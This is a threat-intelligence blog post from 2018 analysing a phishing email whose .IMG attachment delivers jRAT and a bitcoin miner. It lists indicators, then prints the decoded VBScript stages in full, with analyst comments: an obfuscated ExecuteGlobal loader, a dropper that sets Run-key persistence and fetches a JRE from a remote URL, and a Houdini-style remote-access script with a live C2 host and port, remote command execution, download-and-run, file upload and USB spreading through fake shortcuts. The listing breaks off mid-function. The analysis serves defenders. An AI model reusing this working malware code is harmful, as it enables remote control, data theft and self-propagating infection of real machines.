Monday, November 5, 2018

Jrat and Bitcoin miner from Phishing email with .IMG with nested .VBS 11/5/2018

A phishing email delivers a .IMG disk-image attachment with a .VBS script inside; the script drops jRAT and a bitcoin miner.


X-Env-Sender: dbittnerf@gmail.com
x-originating-ip: [162.144.196.83]
Received: from server.ineli-mena.org (HELO server.ineli-mena.org)
From: "Purchase Assistance" <dbittnerf@gmail.com>
Subject: RE: B&G EQUIPMENT PO# 102571
Date: Mon, 5 Nov 2018 

-------------


more details here

https://pastebin.com/raw/tkGXMENU

and also pasted below

---------------


#phishing email drops a bitcoin miner and jrat out of a .IMG file with a .VBS inside

more info @neonprimetime
https://neonprimetime.blogspot.com/2018/11/jrat-and-bitcoin-miner-from-img-vbs-phish.html

------
VT links
------
https://www.virustotal.com/#/file/f2bd54981d86e7d475164ca5725090232dc1efd5251c42b58292d8b51e506aa2/community
https://www.virustotal.com/#/file/370784be22039af009a0b4e7915e36c4899133ac3afbb659cbbbec03dc9a2c6e/community
https://www.virustotal.com/#/file/07e13a645058b0f0afe4e79a34abf08dbead97c50b41cb9593035af13250e0f1/community
https://www.virustotal.com/#/file/b0cf01550e576a21ff62f1c34dbe202b14b73b0465cdf7558c445f09eee3a6c1/community
https://www.virustotal.com/#/file/5dcd1a584e27f75870b2c95aac56523927377d8c693fe6fc8a3f422cac79cadc/community
https://www.virustotal.com/#/file/77ecb4b190368eacf09103247fdd75c0c30a6b3c3340acb3d15df7747178cabc/community

----
app anyrun
----
https://app.any.run/tasks/77449da4-d60e-4c45-922c-b4a85c7ef814

-----
dns
-----
welcomehome.duckdns.org [173.46.85.98]
fud.fudcrypt.com

----
md5 hashes
----
f3a99bcd752bff6a15154484c94cdc21
f3c67b1a2631fde05b24ab26ce5bf6ea
b93df40c82b94680218ea964b5ce6808 ( THOR APT scanner says #magickitten #jrat #MiddleEasternThreatGroups )
11d828c9301a36749174b1e0459cba55
d859b188405930541aea64ad22f8cf92
7443f9ecbd050b1e7eae529983543b05

------
email headers
------
X-Env-Sender: dbittnerf@gmail.com 
x-originating-ip: [162.144.196.83] 
Received: from server.ineli-mena.org (HELO server.ineli-mena.org) 
From: "Purchase Assistance" <dbittnerf@gmail.com> 
Subject: RE: B&G EQUIPMENT PO# 102571
Date: Mon, 5 Nov 2018

---------------
vbscript
---------------
' Script-level ADODB.Stream instance; hen() below uses it to turn a byte array into text.
Set noun = CreateObject("ADODB.Stream")
' hen: byte-array-to-string helper used by the loader.
' When omo = 4, the bytes in `water` are written into the shared stream `noun` in
' binary mode (Type 1), the position is rewound, the stream is switched to text mode
' (Type 2, charset us-ascii) and the content is returned as a string.
' For any other value of omo nothing is assigned to the return value.
' `alafia` is never read; it appears to be padding to obscure the call.
Private Function hen(water, omo, alafia)
  If omo = 4 Then
    noun.Type = 1
    noun.Open
    noun.Write water
    noun.Position = 0
    noun.Type = 2
    noun.CharSet = "us-ascii"
    hen = noun.ReadText
  End If
End Function

' bas_6_4_2_bin: base64 decoder built on Microsoft.XMLDOM.
' Only `kili` (the base64 text) is used; it is assigned to a temporary element whose
' DataType is "bin.base64" and the decoded bytes are returned via NodeTypedValue.
' The other five parameters are never read.
' Analyst note: the XMLDOM "bin.base64" + ADODB.Stream pairing inside a .vbs is a
' useful script-content detection point.
Private Function bas_6_4_2_bin(kintu, kinpo, kili, manj, aaro, sport)
    Set ms_lmx_dfa = CreateObject("Microsoft.XMLDOM")
    Set ms_pmt_dfa = ms_lmx_dfa.createElement("tmp")
    ms_pmt_dfa.DataType = "bin.base64"
    ms_pmt_dfa.Text = kili
    bas_6_4_2_bin = ms_pmt_dfa.NodeTypedValue
End Function
' table: executes the VBScript source text in `naira` with ExecuteGlobal.
' The For loop runs exactly once (0 To 0); the first five parameters are never read.
' Analyst note: this is the point where the decoded next stage runs in-process, so the
' next-stage script is not written to disk by this loader itself.
Private Sub table(chair, milo, sound, clef, sule, naira)
 For i = 0 To 0
     ExecuteGlobal naira
 Next
End Sub

' linen: two-mode helper selected by `radio`.
'   radio = 0 : takes the embedded blob m_a_i_n (redacted as "[REMOVED]" on this page),
'               replaces every "#(" marker with "m", and returns the base64-decoded bytes.
'   otherwise : returns `ladela` unchanged.
' `stove` and `gard` are never read. The "#(" substitution breaks the base64 alphabet,
' so the blob does not decode until the marker has been replaced.
Private Function linen(stove, gard, radio, ladela)
    Dim m_u_t_e_x, the_const, m_a_i_n, pau_sed
    m_u_t_e_x = "#("
    the_const = "m"
    m_a_i_n = "[REMOVED]"
    pau_sed = ""
    If radio = 0 Then
        pau_sed = Replace(m_a_i_n, m_u_t_e_x, the_const)
        linen = bas_6_4_2_bin(Nothing, 1, pau_sed, 10, 87, False)
    Else
        'table "7", False, 10, ladela, Nothing, 10
        linen = ladela
    End If
End Function
' Loader entry point. Reading the nested call inside-out:
'   linen(..., 0, ...)  -> base64-decodes the embedded blob to bytes
'   hen(bytes, 4, ...)  -> converts those bytes to an ASCII string
'   linen(..., 1, text) -> returns the text unchanged
' table then passes the text to ExecuteGlobal, i.e. the decoded stage runs here.
Dim kilimanjaro
kilimanjaro = linen(0, Nothing, 1, hen(linen(0, Nothing, 0, 284), 4, Nothing))
table "2", Nothing, False, True, 0, kilimanjaro
Set noun = Nothing

---------------
decoded binary
---------------
' Second stage (decoded from the loader). It drops two files and starts both:
'   %appdata%\VRMedabkRb.vbs  - another VBScript, run directly
'   %appdata%\ntfsmgr.jar     - a Java archive, run with javaw.exe -jar
' Host indicators visible here: the two file paths above and the HKCU Run value "ntfsmgr".
Const TypeBinary = 1
Const ForReading = 1, ForWriting = 2, ForAppending = 8
' --- Drop and launch the nested .vbs (payload redacted on this page) ---
Dim longText1
longText1 = "[REMOVED]"
Set wshShell1 = CreateObject("WScript.Shell")
Dim appdatadir1, stubpath1
appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%")
stubpath1 = appdatadir1 & "\VRMedabkRb.vbs"
Dim decoded1
decoded1 = decodeBase64(longText1)
writeBytes stubpath1, decoded1
wshShell1.Run("""" & stubpath1 & """")
Set wshShell1 = Nothing
' --- Drop the .jar; "#(" markers are swapped for "A" before base64 decoding ---
Dim longText
longText = "[REMOVED]"
longText = Replace(longText, "#(", "A")
Set wshShell = CreateObject( "WScript.Shell" )
Dim tempdir, appdatadir, text, stubpath
tempdir = wshShell.ExpandEnvironmentStrings("%temp%")
appdatadir = wshShell.ExpandEnvironmentStrings("%appdata%")
stubpath = appdatadir & "\ntfsmgr.jar"
Dim decoded
decoded = decodeBase64(longText)
writeBytes stubpath, decoded
Set fso  = CreateObject("Scripting.FileSystemObject")
' From here on, failures (e.g. missing registry values) are ignored and execution continues.
On Error Resume Next
' --- Locate an installed Java runtime: Wow6432Node first, then the native JavaSoft key ---
text = wshShell.RegRead("HKLM\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment\CurrentVersion")
text = wshShell.RegRead("HKLM\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment\" & text & "\JavaHome")
If text = "" Then
text = wshShell.RegRead("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\CurrentVersion")
text = wshShell.RegRead("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\" & text & "\JavaHome")
If text <> "" Then
text = text & "\bin\javaw.exe"
End If
Else
text = text & "\bin\javaw.exe"
End If
' --- If a usable JRE is found: persist via the HKCU Run key and start the jar.
'     Otherwise fall back to GrabJreFromNet, which downloads a JRE. ---
If InStr(text, "jre") > 0 Then
Dim validJrePath
validJrePath = getValidJre(text)
If InStr(validJrePath, "javaw.exe") > 0 Then
wshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr", """" & validJrePath & """ -jar """ & stubpath & """", "REG_SZ"
wshShell.Run("""" & validJrePath & """" & " -jar " & """" & stubpath & """")
Else
GrabJreFromNet()
End If
Else
GrabJreFromNet()
End If
' GrabJreFromNet: fallback used when no suitable local JRE was found.
' Fetches jre.zip over plain HTTP with a synchronous Microsoft.XMLHTTP GET, saves it
' to %appdata%\jre.zip (SaveToFile option 2 = overwrite), and unpacks it to %appdata%\jre7.
' It then writes the HKLM JavaSoft CurrentVersion/JavaHome values to point at that copy,
' sets the HKCU Run value "ntfsmgr", and starts the dropped jar with the bundled javaw.exe.
' Indicators: the download URL below, %appdata%\jre.zip, %appdata%\jre7\, and the
' JavaSoft registry values being written by a script host rather than a Java installer.
Private Sub GrabJreFromNet()
Dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://www.thegoldfingerinc.com/images/jre.zip", False
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile appdatadir & "\jre.zip", 2 
end with
UnZip appdatadir & "\jre.zip", appdatadir & "\jre7"
wshShell.RegWrite "HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\CurrentVersion", "1.7", "REG_SZ"
wshShell.RegWrite "HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\1.7\JavaHome", appdatadir & "\jre7", "REG_SZ"
wshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr", """" & appdatadir & "\jre7\bin\javaw.exe"" -jar " & """" & stubpath & """", "REG_SZ"
wshShell.Run("""" & appdatadir & "\jre7\bin\javaw.exe"" -jar " & """" & stubpath & """")
End Sub
' decodeBase64: returns the bytes encoded by the base64 string `base64`.
' Uses a temporary Microsoft.XMLDOM element with DataType "bin.base64"; the decoded
' byte array is read back through NodeTypedValue.
Private Function decodeBase64(base64)
Dim DM, EL
Set DM = CreateObject("Microsoft.XMLDOM")
Set EL = DM.createElement("tmp")
EL.DataType = "bin.base64"
EL.Text = base64
decodeBase64 = EL.NodeTypedValue
End Function
' writeBytes: writes the byte array `bytes` to the path `file` using a binary
' ADODB.Stream. ForWriting (2) as the SaveToFile option overwrites an existing file.
' The stream is not explicitly closed here.
Private Sub writeBytes(file, bytes)
Dim binaryStream
Set binaryStream = CreateObject("ADODB.Stream")
binaryStream.Type = TypeBinary
binaryStream.Open
binaryStream.Write bytes
binaryStream.SaveToFile file, ForWriting
End Sub
' UnZip: extracts `zipfile` into the folder `ExtractTo` using the Windows shell
' (Shell.Application NameSpace/CopyHere), so no external unzip tool is needed.
' Does nothing unless the file extension is exactly "zip". Creates the target folder
' if missing and deletes a same-named existing file before copying each item.
' CopyHere option 20 = 4 + 16 (no progress dialog, answer "yes to all").
' Relies on the script-level `fso` object created by the main body.
Sub UnZip(zipfile, ExtractTo)
if fso.GetExtensionName(zipfile) = "zip" then
If NOT fso.FolderExists(ExtractTo) Then
fso.CreateFolder(ExtractTo)
End If
set objShell = CreateObject("Shell.Application")
set destination = objShell.NameSpace(ExtractTo)
set zip_content = objShell.NameSpace(zipfile).Items   
for i = 0 to zip_content.count - 1
if (fso.FileExists(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName(zip_content.item(i).path))) then
fso.DeleteFile(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName(zip_content.item(i).path))
end if
destination.copyHere zip_content.item(i), 20
next 
End if
End Sub
' getValidJre: picks a usable javaw.exe from `res` (one candidate path per CRLF line).
' For each line containing "javaw.exe" it runs `cmd /c "<path>" -version`, hidden
' (window style 0) and waiting for completion, with stderr redirected to
' %temp%\output.txt. The first path whose output mentions 1.6, 1.7 or 1.8 is returned;
' if none matches the return value is left unassigned.
' Uses the script-level wshShell, fso and tempdir. Note that `text` is not declared
' locally, so the script-level variable is overwritten with the file content.
' Indicator: %temp%\output.txt written by cmd.exe spawned from a script host.
Function getValidJre(res)
a = Split(res, vbCrLf)
for each x in a
if InStr(x, "javaw.exe") > 0 Then
Return = wshShell.Run("cmd /c " & """" & x & """" & " -version 2> %temp%\output.txt", 0, true)
Set file = fso.OpenTextFile(tempdir & "\output.txt", 1)
text = file.ReadAll
file.Close
If InStr(text, "1.6") > 0 Or InStr(text, "1.7") > 0 Or InStr(text, "1.8") > 0 Then
getValidJre = x
Exit Function
End If
End If
next
End Function
' Releases the script-level WScript.Shell reference at the end of the listing.
Set wshShell = Nothing


------
nested vbscript
------
' Script-level ADODB.Stream instance; hen() below uses it to turn a byte array into text.
Set noun = CreateObject("ADODB.Stream")
' hen: byte-array-to-string helper, identical to the one in the first-stage loader.
' When omo = 4, the bytes in `water` are written into the shared stream `noun` in
' binary mode (Type 1), the position is rewound, the stream is switched to text mode
' (Type 2, charset us-ascii) and the content is returned as a string.
' For any other value of omo nothing is assigned; `alafia` is never read.
Private Function hen(water, omo, alafia)
  If omo = 4 Then
    noun.Type = 1
    noun.Open
    noun.Write water
    noun.Position = 0
    noun.Type = 2
    noun.CharSet = "us-ascii"
    hen = noun.ReadText
  End If
End Function

' bas_6_4_2_bin: base64 decoder built on Microsoft.XMLDOM.
' Only `kili` (the base64 text) is used; it is assigned to a temporary element whose
' DataType is "bin.base64" and the decoded bytes come back via NodeTypedValue.
' The remaining parameters are never read.
Private Function bas_6_4_2_bin(kintu, kinpo, kili, manj, aaro, sport)
    Set ms_lmx_dfa = CreateObject("Microsoft.XMLDOM")
    Set ms_pmt_dfa = ms_lmx_dfa.createElement("tmp")
    ms_pmt_dfa.DataType = "bin.base64"
    ms_pmt_dfa.Text = kili
    bas_6_4_2_bin = ms_pmt_dfa.NodeTypedValue
End Function
' table: executes the VBScript source text in `naira` with ExecuteGlobal.
' The loop body runs exactly once (0 To 0); the first five parameters are never read.
Private Sub table(chair, milo, sound, clef, sule, naira)
 For i = 0 To 0
     ExecuteGlobal naira
 Next
End Sub

' linen: same two-mode helper as in the first-stage loader, except that the "#("
' marker is replaced with "A" here (the first stage uses "m").
'   radio = 0 : un-mangles the embedded blob m_a_i_n (redacted as "[REMOVED]" on this
'               page) and returns the base64-decoded bytes.
'   otherwise : returns `ladela` unchanged.
' `stove` and `gard` are never read.
Private Function linen(stove, gard, radio, ladela)
    Dim m_u_t_e_x, the_const, m_a_i_n, pau_sed
    m_u_t_e_x = "#("
    the_const = "A"
    m_a_i_n = "[REMOVED]"
    pau_sed = ""
    If radio = 0 Then
        pau_sed = Replace(m_a_i_n, m_u_t_e_x, the_const)
        linen = bas_6_4_2_bin(Nothing, 1, pau_sed, 10, 87, False)
    Else
        'table "7", False, 10, ladela, Nothing, 10
        linen = ladela
    End If
End Function
' Entry point of the nested loader: decode the embedded blob to bytes, convert the
' bytes to ASCII text with hen, pass the text through linen unchanged (radio = 1),
' then hand it to table, which runs it with ExecuteGlobal.
Dim kilimanjaro
kilimanjaro = linen(0, Nothing, 1, hen(linen(0, Nothing, 0, 284), 4, Nothing))
table "2", Nothing, False, True, 0, kilimanjaro
Set noun = Nothing


-----
3rd nested script decoded
-----

' Third stage: a VBScript remote-access script. The banner and section markers below
' are part of the sample as recovered and are useful as static signature strings.
'<[ recoder : houdini (c) skype : houdini-fx ]>

'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

' Command-and-control endpoint. The commented-out host/port pair is left in the sample
' and is worth tracking as a secondary indicator alongside the active pair.
'host = "pm2bitcoin.com"
'port = 3175
host = "fud.fudcrypt.com"
port = 7755
' installdir is expanded further down; lnkfile / lnkfolder enable the shortcut
' replacement of files and folders performed by the install sub.
installdir = "%appdata%"
lnkfile = true
lnkfolder = true

'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

' Shared COM objects used by every routine: shell, file system and HTTP client.
dim shellobj 
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")


'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

' installname is whatever file name the script is currently running under, so the
' persistence artefacts created later take their name from the dropped file.
installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
' Falls back to %temp% when the expanded install directory does not exist.
if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
' Field separator "<|>" used in both requests and responses.
spliter = "<" & "|" & ">"
' Polling interval in milliseconds between check-ins (changeable by the "sleep" command).
sleep = 5000 
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
' Handle to the installed script file, opened in `instance`.
dim oneonce

'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
' Main loop. Errors are suppressed globally, so a failed request just yields an
' empty response and the loop continues after the sleep interval.
on error resume next


' One-time setup: registry marker, persistence, relaunch from the install location.
instance
while true

' Re-applies persistence and the removable-drive copy on every iteration.
install

' Check-in: POST to http://<host>:<port>/is-ready. The reply is split on "<|>";
' field 0 is the command name, fields 1 and 2 are its arguments.
response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
' "excecute" (sic): runs server-supplied VBScript source in-process.
case "excecute"
      param = cmd (1)
      execute param
' "update": overwrites the installed script with server-supplied text (mode 2 =
' write), relaunches it under wscript.exe //B and exits this instance.
case "update"
      param = cmd (1)
      oneonce.close
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      wscript.quit 
case "uninstall"
      uninstall
' "send" / "site-send": fetch a file (from the C2 or from an arbitrary URL) and run it.
case "send"
      download cmd (1),cmd (2)
case "site-send"
      sitedownloader cmd (1),cmd (2)
' "recv": send a local file to the C2.
case "recv"
      param = cmd (1)
      upload (param)
' enum-*: drive, directory and process listings posted back under "is-enum-*".
case  "enum-driver"
      post "is-enum-driver",enumdriver  
case  "enum-faf"
      param = cmd (1)
      post "is-enum-faf",enumfaf (param)
case  "enum-process"
      post "is-enum-process",enumprocess   
' "cmd-shell": run a command line and post its output back.
case  "cmd-shell"
      param = cmd (1)
      post "is-cmd-shell",cmdshell (param)  
case  "delete"
      param = cmd (1)
      deletefaf (param) 
case  "exit-process"
      param = cmd (1)
      exitprocess (param) 
' "sleep": the new interval is passed through eval, i.e. it is evaluated as an expression.
case  "sleep"
      param = cmd (1)
      sleep = eval (param)        
end select

wscript.sleep sleep

wend


' install: re-applies persistence (upstart) and then propagates to removable media.
' For every ready drive with free space whose DriveType is 1 (removable):
'   - copies the running script to the drive root and marks it Hidden+System (2+4);
'   - if lnkfile is set, marks every non-.lnk file in the root Hidden+System and
'     creates a same-named .lnk whose target is cmd.exe and whose arguments start
'     the script copy and then the original file;
'   - if lnkfolder is set, does the same for every root-level folder (the shortcut
'     opens the folder with explorer after starting the script).
' Shortcuts are created minimized (WindowStyle 7) and borrow the original item's icon.
' Forensic indicators on removable media: Hidden+System originals next to .lnk files
' with TargetPath cmd.exe and arguments of the form "/c start <script>&start <item>&exit".
sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

upstart
for each drive in filesystemobj.drives

if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    ' Copy self to the drive root and hide the copy.
    filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
    if  filesystemobj.fileexists (drive.path & "\" & installname)  then
        filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
    end if
    for each file in filesystemobj.getfolder( drive.path & "\" ).Files
        if not lnkfile then exit for
        if  instr (file.name,".") then
            ' Skip existing shortcuts; everything else is hidden and shadowed by a .lnk.
            if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
                file.attributes = 2+4
                if  ucase (file.name) <> ucase (installname) then
                    filename = split(file.name,".")
                    set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk") 
                    lnkobj.windowstyle = 7
                    lnkobj.targetpath = "cmd.exe"
                    lnkobj.workingdirectory = ""
                    lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
                    ' Icon is looked up from the file type's DefaultIcon registry entry.
                    fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") 
                    if  instr (fileicon,",") = 0 then
                        lnkobj.iconlocation = file.path
                    else 
                        lnkobj.iconlocation = fileicon
                    end if
                    lnkobj.save()
                end if
            end if
        end if
    next
    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
        if not lnkfolder then exit for
        folder.attributes = 2+4
        foldername = folder.name
        set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk") 
        lnkobj.windowstyle = 7
        lnkobj.targetpath = "cmd.exe"
        lnkobj.workingdirectory = ""
        lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
        foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\") 
        if  instr (foldericon,",") = 0 then
            lnkobj.iconlocation = folder.path
        else 
            lnkobj.iconlocation = foldericon
        end if
        lnkobj.save()
    next
end If
end If
end if
next
err.clear
end sub

' uninstall: self-removal routine triggered by the "uninstall" command.
' Deletes the Run values (HKCU and HKLM) named after the script's base name, the copy
' in the Startup folder and the running script itself. On removable drives it resets
' file and folder attributes to 0 (un-hiding the originals), deletes the .lnk files
' it created and its own copy, then terminates the script host.
' Useful for remediation: the same list of artefacts is what a manual clean-up
' needs to cover. The HKLM\software\<name> marker written by `instance` is not
' removed here.
sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for  each drive in filesystemobj.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    for  each file in filesystemobj.getfolder ( drive.path & "\").files
         on error resume next
         if  instr (file.name,".") then
             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
                 ' Non-shortcut: un-hide it, then remove its shadow .lnk (or the script copy).
                 file.attributes = 0
                 if  ucase (file.name) <> ucase (installname) then
                     filename = split(file.name,".")
                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                 else
                     filesystemobj.deletefile (drive.path & "\" & file.name)
                 end If
             else
                 ' Any .lnk in the drive root is deleted, not only the ones this script made.
                 filesystemobj.deletefile (file.path) 
             end if
         end if
     next
     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
         folder.attributes = 0
     next
end if
end if
end if
next
wscript.quit
end sub

' post: single C2 request primitive. Sends a synchronous HTTP POST to
' http://<host>:<port>/<cmd> with `param` as the body and returns the response text.
' Host details from `information` are sent in a request header whose name is passed
' as "user-agent:" (with the colon). With errors suppressed by the caller, a failed
' request leaves the return value as `param` or as an empty response.
' Network indicators: plain-HTTP POSTs to port 7755 with paths such as /is-ready,
' and "<|>"-separated host data in the header value.
function post (cmd ,param)

post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function

' information: builds the host-identification string sent with every request.
' Fields, joined by spliter ("<|>"), in order: volume serial (hwid), computer name,
' user name, OS caption from Win32_OperatingSystem, the literal "plus", installed
' antivirus names (security), and the usbspreading marker set by `instance`.
' This is the data an affected host discloses on each check-in.
function information
on error resume next
if  inf = "" then
    inf = hwid & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter

    set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
    set os = root.execquery ("select * from win32_operatingsystem")
    for each osinfo in os
       inf = inf & osinfo.caption & spliter  
       exit for
    next
    inf = inf & "plus" & spliter
    inf = inf & security & spliter
    inf = inf & usbspreading
    information = inf  
else
    information = inf
end if
end function


' upstart: persistence. Writes a Run value under both HKCU and HKLM, named after the
' script's base name, with data `wscript.exe //B "<installdir><installname>"`, and
' copies the running script into installdir and into the user's Startup folder.
' Errors are suppressed, so a failed HKLM write (no admin rights) is silently skipped.
' Detection: Run values whose data starts with "wscript.exe //B" and points at a
' script under %appdata% or %temp%, plus a script file in the Startup folder.
sub upstart ()
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub


' hwid: returns the first non-empty VolumeSerialNumber reported by WMI
' (Win32_LogicalDisk); it is used as the host identifier in `information`.
function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
    if  disk.volumeserialnumber <> "" then
        hwid = disk.volumeserialnumber
        exit for
    end if
next
end function


' security: reports which antivirus products are registered on the host.
' Derives an OS version number from Win32_OperatingSystem and uses it to choose
' between the WMI namespaces root\securitycenter2 (version > 6) and
' root\securitycenter, then queries AntiVirusProduct and concatenates each
' displayName followed by " .". Returns "nan-av" when nothing was collected.
' All errors are suppressed, so a failed WMI lookup also yields "nan-av".
function security 
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
    versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for  x = 1 to ubound (versionstr)
  osversion = osversion &  versionstr (i)
next
osversion = eval (osversion)
if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
    security  = security  & objantivirus.displayname & " ."
next
if security  = "" then security  = "nan-av"
end function


' instance: start-up routine, called once before the main loop.
' 1. Reads the default value of HKLM\software\<script base name>\. If it is empty,
'    writes "true - <date>" when the script is running from a drive root
'    (path is "<letter>:\<installname>"), otherwise "false - <date>". This marker is
'    later reported to the C2 as the last field of `information`.
' 2. Calls upstart to establish persistence.
' 3. If the running copy is not the installed copy (short paths differ), launches the
'    installed copy with wscript.exe //B and exits.
' 4. Opens the installed script for appending (mode 8) and keeps the handle in
'    `oneonce`; the script quits if that open fails. Presumably this works as a
'    single-instance lock - confirm by testing.
' Forensic indicator: registry key HKLM\software\<script base name> holding a
' "true - <date>" / "false - <date>" string.
function instance
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
   if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
      usbspreading = "true - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
   else
      usbspreading = "false - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"

   end if
end If



upstart
set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =  filesystemobj.getfile (installdir & installname)
if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then 
    shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
    wscript.quit 
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if  err.number > 0 then wscript.quit
end function


' sitedownloader: handler for the "site-send" command.
' Downloads `fileurl` (any URL supplied by the server) with a synchronous GET, deletes
' an existing file of the same name, saves the body to <installdir><filename> when the
' status is 200, and then runs the saved file via its short path.
' Detection: a script host writing a new file under the install directory and
' immediately launching it.
sub sitedownloader (fileurl,filename)

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
 
if objhttpdownload.status = 200 then
   dim  objstreamdownload
   set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
  .type = 1 
  .open
  .write objhttpdownload.responsebody
  .savetofile strsaveto
  .close
   end with
   set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub

' download: handler for the "send" command; pulls a file from the C2 itself.
' Requests http://<host>:<port>/is-sending<|><fileurl> with a POST, saves the response
' body (status 200 only) to <filedir> + the part of fileurl after the last backslash,
' and runs the saved file. An empty filedir defaults to installdir.
' Network indicator: request path beginning with "is-sending<|>".
sub download (fileurl,filedir)

if filedir = "" then 
   filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
     
set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
